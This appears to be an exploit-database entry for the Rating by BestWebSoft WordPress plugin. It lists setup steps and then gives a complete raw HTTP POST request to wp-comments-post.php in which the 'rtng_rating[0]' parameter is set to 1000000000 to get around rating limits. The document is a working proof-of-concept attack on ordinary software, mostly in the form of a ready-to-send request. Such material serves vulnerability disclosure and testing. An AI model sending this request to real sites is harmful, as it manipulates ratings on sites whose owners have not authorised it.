Share
## https://sploitus.com/exploit?id=WPEX-ID:EFB1DDEF-2123-416C-A932-856D41ED836D
Under Settings -> Discussion, uncheck "Comment must be manually approved"
Install and Enable Rating BestWebSoft plugin Change "Enable Rating for" to "All" (Works for others, but this allows guest to post) Change "My Rating Position" to "In comments"
Submit a valid comment and capture with Burp or another application. Change the post parameter "rtng_rating[0]" to a large integer such as 1000000000

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Connection: close
Cookie: [depends on plugin's settings]
Upgrade-Insecure-Requests: 1

rtng_show_title=1&rtng_rating%5B0%5D=1000000000&comment=aa&author=Yolo&email=krkgh%40jgoirtjg.com&url=&submit=Post+Comment&comment_post_ID=5887&comment_parent=0